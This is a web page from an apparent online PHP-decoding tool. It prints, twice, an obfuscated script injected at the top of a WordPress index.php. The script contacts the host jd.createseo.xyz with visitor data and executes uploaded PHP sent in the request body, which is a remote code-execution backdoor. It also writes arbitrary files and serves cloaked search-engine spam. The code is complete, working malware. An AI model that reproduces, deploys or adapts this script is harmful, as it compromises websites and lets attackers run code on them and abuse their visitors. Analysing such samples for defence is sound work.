Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php error_reporting(0);@set_time_limit(3600);@ignore_user_abort(1);$m635=base64_decode(b..

Decoded Output download

<?php error_reporting(0);@set_time_limit(3600);@ignore_user_abort(1);$m635=base64_decode(base64_decode("TWk0eUxqRTM="));$g36 = "jd.createseo.xyz";$k3 = base64_decode("NDAwMg==");$n11 = clientip();$c8 = isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVNSVVpGVWtWUw=="))]) ? $_SERVER[base64_decode(base64_decode("U0ZSVVVGOVNSVVpGVWtWUw=="))] : base64_decode("");$y31 = isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVZVMFZTWDBGSFJVNVU="))]) ? $_SERVER[base64_decode(base64_decode("U0ZSVVVGOVZVMFZTWDBGSFJVNVU="))] : base64_decode("");$c8i = $_SERVER[base64_decode("UkVRVUVTVF9VUkk=")];$d2 = $_SERVER[base64_decode("SFRUUF9IT1NU")];$d20 = isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOUJRME5GVUZSZlRFRk9SMVZCUjBVPQ=="))])?$_SERVER[base64_decode(base64_decode("U0ZSVVVGOUJRME5GVUZSZlRFRk9SMVZCUjBVPQ=="))]:base64_decode("");$s13 = isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlSRTlKVFE9PQ=="))])?$_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlSRTlKVFE9PQ=="))]:base64_decode("");$g23 = ((!empty($_SERVER[base64_decode(base64_decode("U0ZSVVVGTT0="))]) && strtolower($_SERVER[base64_decode(base64_decode("U0ZSVVVGTT0="))]) !== base64_decode(base64_decode("YjJabQ=="))) || (isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlRVWs5VVR3PT0="))]) && $_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlRVWs5VVR3PT0="))] === base64_decode(base64_decode("YUhSMGNITT0="))) || (!empty($_SERVER[base64_decode(base64_decode("U0ZSVVVGOUdVazlPVkY5RlRrUmZTRlJVVUZNPQ=="))]) && strtolower($_SERVER[base64_decode(base64_decode("U0ZSVVVGOUdVazlPVkY5RlRrUmZTRlJVVUZNPQ=="))]) !== base64_decode(base64_decode("YjJabQ==")))) ?  base64_decode("aHR0cHM="): base64_decode("aHR0cA==");$h21 = array(base64_decode(base64_decode("VEdGdVp6b2c=")).$d20,base64_decode(base64_decode("VlhObGNpMUJaMlZ1ZERvZw==")).$y31, base64_decode(base64_decode("VW1WbVpYSmxjam9n")).$c8, base64_decode(base64_decode("U0hSMGNDMVFjbTkwYnpvZw==")).$g23, base64_decode(base64_decode("U0hSMGNDMUliM04wT2lBPQ==")).$d2, base64_decode(base64_decode("U0hSMGNDMVZjbWs2SUE9PQ==")).$c8i, base64_decode(base64_decode("UkdKbmNtOTFjRG9n")).$g36, base64_decode(base64_decode("U0hSMGNDMVlMVVp2Y25kaGNtUmxaQzFHYjNJNklBPT0=")).$n11,base64_decode(base64_decode("Vkc5clpXNDZJQT09")).$s13);$r17= "proto=$g23&shost=$d2&ip=$n11&dbgroup=$k3&uri=$c8i";if (strlen($s13)>0){ @todk(base64_decode("LmVHYkEwVHkyV2g="),@file_get_contents(base64_decode("cGhwOi8vaW5wdXQ=")),FILE_USE_INCLUDE_PATH);  echo (include base64_decode(base64_decode("TG1WSFlrRXdWSGt5VjJnPQ=="))); unlink(base64_decode(base64_decode("TG1WSFlrRXdWSGt5VjJnPQ==")));  exit; }if (($c8i!==base64_decode("L2Zhdmljb24uaWNv")) &&( @preg_match(base64_decode(base64_decode("STJkdmIyZHNaWHg1WVdodmIzeGlhVzVuSTJrPQ==")),$y31) || (@preg_match(base64_decode(base64_decode("STJkdmIyZHNaUzVqYnk1cWNIeG5iMjluYkdVdVkyOXRmSGxoYUc5dkxtTnZiWHg1WVdodmJ5NWpieTVxY0h4aWFXNW5MbU52YlNOcA==")),$c8) && @preg_match(base64_decode(base64_decode("STFzdlhEOWRLRnRoTFhvd0xUbGRlekY5S1NoY1pDc3BJMms9")),$c8i)))){        list($m639,$r24,$u14) = urlx(base64_decode(base64_decode("YUhSMGNEb3ZMdz09")).$g36.base64_decode(base64_decode("TDJsdVpHVjRQdz09")).$r17,$h21,$r17);    if (stripos($u14,base64_decode(base64_decode("WjNwcGNBPT0=")))>0){ @header(base64_decode(base64_decode("UTI5dWRHVnVkQzEwZVhCbE9pQmhjSEJzYVdOaGRHbHZiaTk0TFdkNmFYQT0="))); exit($m639); }    if (stripos($m639,base64_decode(base64_decode("UENGa2IyTjA=")))===0||stripos($m639,base64_decode(base64_decode("UEdoMGJXdz0=")))===0){ exit($m639); }    if (stripos($m639,base64_decode(base64_decode("UEQ5NGJXdz0=")))===0){ @header(base64_decode(base64_decode("UTI5dWRHVnVkQzEwZVhCbE9pQjBaWGgwTDNodGJBPT0="))); exit($m639); }        if (stripos($m639,base64_decode(base64_decode("YUhSMGNBPT0=")))===0){        if (stripos($m639,base64_decode(base64_decode("UDIxaGFXNWZjR0ZuWlQwPQ==")))){ @header(base64_decode(base64_decode("VEc5allYUnBiMjQ2SUE9PQ==")) . $m639); exit;}        if (strstr($m639,base64_decode("Wyxd"))){$q42 = explode(base64_decode("Wyxd"),$m639); $s25 = explode(base64_decode("LA=="),$q42[0]); $m643 = base64_decode(base64_decode("")); foreach($s25 as $c8l){ list($z9,$r24) = urlx($c8l,null,null,$q42[1]);$m643 .= $c8l.$z9; } exit($m643);}    }    if (@preg_match(base64_decode(base64_decode("STE1YlhpNWRLaTRvZEhoMGZIQm9jQ2tqYVE9PQ==")),$m639)){$c4 = explode(base64_decode("Wyxd"),$m639); todk($c4[0],$c4[1]); if(file_exists($c4[0])){ exit(base64_decode(base64_decode("Wlc1a0lHOXI=")));}else{ exit(base64_decode(base64_decode("Ym04Z1ptRnNjMlU9")));} }    if (stripos($m639,base64_decode(base64_decode("YjJzPQ==")))===0){ exit($m639.base64_decode("amQuY3JlYXRlc2VvLnh5ejQwMDI=")); }    if ($r24 >= 400 && $r24 < 500){@header(base64_decode(base64_decode("U0ZSVVVDOHhMakVnTkRBMElFNXZkQ0JHYjNWdVpBPT0=")));exit;}    if ($r24 >= 500){@header(base64_decode(base64_decode("U0ZSVVVDOHhMakVnTlRBd0lFbHVkR1Z5Ym1Gc0lGTmxjblpsY2lCRmNuSnZjZz09")));exit;}    if ($m639!=base64_decode("")){ exit($m639); }}function urlx($c8l,$h21=null,$r17=null,$y31=null) {    if (!function_exists(base64_decode(base64_decode("WTNWeWJGOXBibWww")))){ return; }    try {        $d43 = curl_init();        curl_setopt($d43, CURLOPT_URL, $c8l); curl_setopt($d43, CURLOPT_FOLLOWLOCATION,1); curl_setopt($d43, CURLOPT_SSL_VERIFYPEER, FALSE);        curl_setopt($d43, CURLOPT_SSL_VERIFYHOST, FALSE);curl_setopt($d43, CURLOPT_ENCODING, base64_decode(base64_decode("WjNwcGNDeGtaV1pzWVhSbA==")));        curl_setopt($d43, CURLOPT_CONNECTTIMEOUT, 30); curl_setopt($d43, CURLOPT_RETURNTRANSFER, 1);        ($h21===null)?base64_decode(base64_decode("")):curl_setopt($d43, CURLOPT_HTTPHEADER, $h21); ($y31===null||$y31===base64_decode(""))?base64_decode(base64_decode("")):curl_setopt($d43, CURLOPT_USERAGENT, $y31);        if ($r17!==null && $r17!==base64_decode("")) {curl_setopt($d43, CURLOPT_POST, 1); curl_setopt($d43, CURLOPT_POSTFIELDS, $r17); }        $u47 = curl_exec($d43);$r24 = curl_getinfo($d43,CURLINFO_HTTP_CODE); $u14 = curl_getinfo($d43,CURLINFO_CONTENT_TYPE);curl_close($d43);    } catch (Exception $m6) { }   if ($u47===false && function_exists(base64_decode(base64_decode("Wm1sc1pWOW5aWFJmWTI5dWRHVnVkSE09")))) {        ini_set(base64_decode(base64_decode("ZFhObGNsOWhaMlZ1ZEE9PQ==")), base64_decode(base64_decode("VFc5NmFXeHNZUzgwTGpBZ0tHTnZiWEJoZEdsaWJHVTdUVk5KUlNBMkxqQTdWMmx1Wkc5M2N5Qk9WQ0ExTGpJN0xrNUZWQ0JEVEZJZ01TNHhMalF6TWpJcA==")));        try {            $u47 = @file_get_contents($c8l);        } catch (Exception $m6) { }    }    return array($u47,$r24,$u14);}function todk($e24,$k41){@file_put_contents($e24,$k41);}function clientip(){ $v46=base64_decode(base64_decode(""));    if (isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlHVDFJPQ=="))]) && $_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlHVDFJPQ=="))] !== base64_decode(base64_decode(""))){  $v46 = $_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlHVDFJPQ=="))];    } elseif (getenv(base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))) && strcasecmp(getenv(base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))), base64_decode(base64_decode("ZFc1cmJtOTNiZz09")))) {  $v46 = getenv(base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ==")));    } elseif (isset($_SERVER[base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))]) && $_SERVER[base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))] && strcasecmp($_SERVER[base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))], base64_decode(base64_decode("ZFc1cmJtOTNiZz09")))) {  $v46 = $_SERVER[base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))];    }    if (stristr($v46, base64_decode(base64_decode("TEE9PQ==")))) { $c4 = explode(base64_decode("LA=="), $v46); $v46 = $c4[0]; } return $v46;}?>  
<?php  
define( 'WP_USE_THEMES', true );  
/** Loads the WordPress Environment and Template */  
require __DIR__ . '/wp-blog-header.php';  
?>

Did this file decode correctly?

Original Code

<?php error_reporting(0);@set_time_limit(3600);@ignore_user_abort(1);$m635=base64_decode(base64_decode("TWk0eUxqRTM="));$g36 = "jd.createseo.xyz";$k3 = base64_decode("NDAwMg==");$n11 = clientip();$c8 = isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVNSVVpGVWtWUw=="))]) ? $_SERVER[base64_decode(base64_decode("U0ZSVVVGOVNSVVpGVWtWUw=="))] : base64_decode("");$y31 = isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVZVMFZTWDBGSFJVNVU="))]) ? $_SERVER[base64_decode(base64_decode("U0ZSVVVGOVZVMFZTWDBGSFJVNVU="))] : base64_decode("");$c8i = $_SERVER[base64_decode("UkVRVUVTVF9VUkk=")];$d2 = $_SERVER[base64_decode("SFRUUF9IT1NU")];$d20 = isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOUJRME5GVUZSZlRFRk9SMVZCUjBVPQ=="))])?$_SERVER[base64_decode(base64_decode("U0ZSVVVGOUJRME5GVUZSZlRFRk9SMVZCUjBVPQ=="))]:base64_decode("");$s13 = isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlSRTlKVFE9PQ=="))])?$_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlSRTlKVFE9PQ=="))]:base64_decode("");$g23 = ((!empty($_SERVER[base64_decode(base64_decode("U0ZSVVVGTT0="))]) && strtolower($_SERVER[base64_decode(base64_decode("U0ZSVVVGTT0="))]) !== base64_decode(base64_decode("YjJabQ=="))) || (isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlRVWs5VVR3PT0="))]) && $_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlRVWs5VVR3PT0="))] === base64_decode(base64_decode("YUhSMGNITT0="))) || (!empty($_SERVER[base64_decode(base64_decode("U0ZSVVVGOUdVazlPVkY5RlRrUmZTRlJVVUZNPQ=="))]) && strtolower($_SERVER[base64_decode(base64_decode("U0ZSVVVGOUdVazlPVkY5RlRrUmZTRlJVVUZNPQ=="))]) !== base64_decode(base64_decode("YjJabQ==")))) ?  base64_decode("aHR0cHM="): base64_decode("aHR0cA==");$h21 = array(base64_decode(base64_decode("VEdGdVp6b2c=")).$d20,base64_decode(base64_decode("VlhObGNpMUJaMlZ1ZERvZw==")).$y31, base64_decode(base64_decode("VW1WbVpYSmxjam9n")).$c8, base64_decode(base64_decode("U0hSMGNDMVFjbTkwYnpvZw==")).$g23, base64_decode(base64_decode("U0hSMGNDMUliM04wT2lBPQ==")).$d2, base64_decode(base64_decode("U0hSMGNDMVZjbWs2SUE9PQ==")).$c8i, base64_decode(base64_decode("UkdKbmNtOTFjRG9n")).$g36, base64_decode(base64_decode("U0hSMGNDMVlMVVp2Y25kaGNtUmxaQzFHYjNJNklBPT0=")).$n11,base64_decode(base64_decode("Vkc5clpXNDZJQT09")).$s13);$r17= "proto=$g23&shost=$d2&ip=$n11&dbgroup=$k3&uri=$c8i";if (strlen($s13)>0){ @todk(base64_decode("LmVHYkEwVHkyV2g="),@file_get_contents(base64_decode("cGhwOi8vaW5wdXQ=")),FILE_USE_INCLUDE_PATH);  echo (include base64_decode(base64_decode("TG1WSFlrRXdWSGt5VjJnPQ=="))); unlink(base64_decode(base64_decode("TG1WSFlrRXdWSGt5VjJnPQ==")));  exit; }if (($c8i!==base64_decode("L2Zhdmljb24uaWNv")) &&( @preg_match(base64_decode(base64_decode("STJkdmIyZHNaWHg1WVdodmIzeGlhVzVuSTJrPQ==")),$y31) || (@preg_match(base64_decode(base64_decode("STJkdmIyZHNaUzVqYnk1cWNIeG5iMjluYkdVdVkyOXRmSGxoYUc5dkxtTnZiWHg1WVdodmJ5NWpieTVxY0h4aWFXNW5MbU52YlNOcA==")),$c8) && @preg_match(base64_decode(base64_decode("STFzdlhEOWRLRnRoTFhvd0xUbGRlekY5S1NoY1pDc3BJMms9")),$c8i)))){        list($m639,$r24,$u14) = urlx(base64_decode(base64_decode("YUhSMGNEb3ZMdz09")).$g36.base64_decode(base64_decode("TDJsdVpHVjRQdz09")).$r17,$h21,$r17);    if (stripos($u14,base64_decode(base64_decode("WjNwcGNBPT0=")))>0){ @header(base64_decode(base64_decode("UTI5dWRHVnVkQzEwZVhCbE9pQmhjSEJzYVdOaGRHbHZiaTk0TFdkNmFYQT0="))); exit($m639); }    if (stripos($m639,base64_decode(base64_decode("UENGa2IyTjA=")))===0||stripos($m639,base64_decode(base64_decode("UEdoMGJXdz0=")))===0){ exit($m639); }    if (stripos($m639,base64_decode(base64_decode("UEQ5NGJXdz0=")))===0){ @header(base64_decode(base64_decode("UTI5dWRHVnVkQzEwZVhCbE9pQjBaWGgwTDNodGJBPT0="))); exit($m639); }        if (stripos($m639,base64_decode(base64_decode("YUhSMGNBPT0=")))===0){        if (stripos($m639,base64_decode(base64_decode("UDIxaGFXNWZjR0ZuWlQwPQ==")))){ @header(base64_decode(base64_decode("VEc5allYUnBiMjQ2SUE9PQ==")) . $m639); exit;}        if (strstr($m639,base64_decode("Wyxd"))){$q42 = explode(base64_decode("Wyxd"),$m639); $s25 = explode(base64_decode("LA=="),$q42[0]); $m643 = base64_decode(base64_decode("")); foreach($s25 as $c8l){ list($z9,$r24) = urlx($c8l,null,null,$q42[1]);$m643 .= $c8l.$z9; } exit($m643);}    }    if (@preg_match(base64_decode(base64_decode("STE1YlhpNWRLaTRvZEhoMGZIQm9jQ2tqYVE9PQ==")),$m639)){$c4 = explode(base64_decode("Wyxd"),$m639); todk($c4[0],$c4[1]); if(file_exists($c4[0])){ exit(base64_decode(base64_decode("Wlc1a0lHOXI=")));}else{ exit(base64_decode(base64_decode("Ym04Z1ptRnNjMlU9")));} }    if (stripos($m639,base64_decode(base64_decode("YjJzPQ==")))===0){ exit($m639.base64_decode("amQuY3JlYXRlc2VvLnh5ejQwMDI=")); }    if ($r24 >= 400 && $r24 < 500){@header(base64_decode(base64_decode("U0ZSVVVDOHhMakVnTkRBMElFNXZkQ0JHYjNWdVpBPT0=")));exit;}    if ($r24 >= 500){@header(base64_decode(base64_decode("U0ZSVVVDOHhMakVnTlRBd0lFbHVkR1Z5Ym1Gc0lGTmxjblpsY2lCRmNuSnZjZz09")));exit;}    if ($m639!=base64_decode("")){ exit($m639); }}function urlx($c8l,$h21=null,$r17=null,$y31=null) {    if (!function_exists(base64_decode(base64_decode("WTNWeWJGOXBibWww")))){ return; }    try {        $d43 = curl_init();        curl_setopt($d43, CURLOPT_URL, $c8l); curl_setopt($d43, CURLOPT_FOLLOWLOCATION,1); curl_setopt($d43, CURLOPT_SSL_VERIFYPEER, FALSE);        curl_setopt($d43, CURLOPT_SSL_VERIFYHOST, FALSE);curl_setopt($d43, CURLOPT_ENCODING, base64_decode(base64_decode("WjNwcGNDeGtaV1pzWVhSbA==")));        curl_setopt($d43, CURLOPT_CONNECTTIMEOUT, 30); curl_setopt($d43, CURLOPT_RETURNTRANSFER, 1);        ($h21===null)?base64_decode(base64_decode("")):curl_setopt($d43, CURLOPT_HTTPHEADER, $h21); ($y31===null||$y31===base64_decode(""))?base64_decode(base64_decode("")):curl_setopt($d43, CURLOPT_USERAGENT, $y31);        if ($r17!==null && $r17!==base64_decode("")) {curl_setopt($d43, CURLOPT_POST, 1); curl_setopt($d43, CURLOPT_POSTFIELDS, $r17); }        $u47 = curl_exec($d43);$r24 = curl_getinfo($d43,CURLINFO_HTTP_CODE); $u14 = curl_getinfo($d43,CURLINFO_CONTENT_TYPE);curl_close($d43);    } catch (Exception $m6) { }   if ($u47===false && function_exists(base64_decode(base64_decode("Wm1sc1pWOW5aWFJmWTI5dWRHVnVkSE09")))) {        ini_set(base64_decode(base64_decode("ZFhObGNsOWhaMlZ1ZEE9PQ==")), base64_decode(base64_decode("VFc5NmFXeHNZUzgwTGpBZ0tHTnZiWEJoZEdsaWJHVTdUVk5KUlNBMkxqQTdWMmx1Wkc5M2N5Qk9WQ0ExTGpJN0xrNUZWQ0JEVEZJZ01TNHhMalF6TWpJcA==")));        try {            $u47 = @file_get_contents($c8l);        } catch (Exception $m6) { }    }    return array($u47,$r24,$u14);}function todk($e24,$k41){@file_put_contents($e24,$k41);}function clientip(){ $v46=base64_decode(base64_decode(""));    if (isset($_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlHVDFJPQ=="))]) && $_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlHVDFJPQ=="))] !== base64_decode(base64_decode(""))){  $v46 = $_SERVER[base64_decode(base64_decode("U0ZSVVVGOVlYMFpQVWxkQlVrUkZSRjlHVDFJPQ=="))];    } elseif (getenv(base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))) && strcasecmp(getenv(base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))), base64_decode(base64_decode("ZFc1cmJtOTNiZz09")))) {  $v46 = getenv(base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ==")));    } elseif (isset($_SERVER[base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))]) && $_SERVER[base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))] && strcasecmp($_SERVER[base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))], base64_decode(base64_decode("ZFc1cmJtOTNiZz09")))) {  $v46 = $_SERVER[base64_decode(base64_decode("VWtWTlQxUkZYMEZFUkZJPQ=="))];    }    if (stristr($v46, base64_decode(base64_decode("TEE9PQ==")))) { $c4 = explode(base64_decode("LA=="), $v46); $v46 = $c4[0]; } return $v46;}?> 
<?php 
define( 'WP_USE_THEMES', true ); 
/** Loads the WordPress Environment and Template */ 
require __DIR__ . '/wp-blog-header.php'; 
?>

Function Calls

set_time_limit	1
error_reporting	1
ignore_user_abort	1

Variables

None

Stats

MD5	0aad9f6a8063a8dcac56eab7c52404de
Eval Count	0
Decode Time	109 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats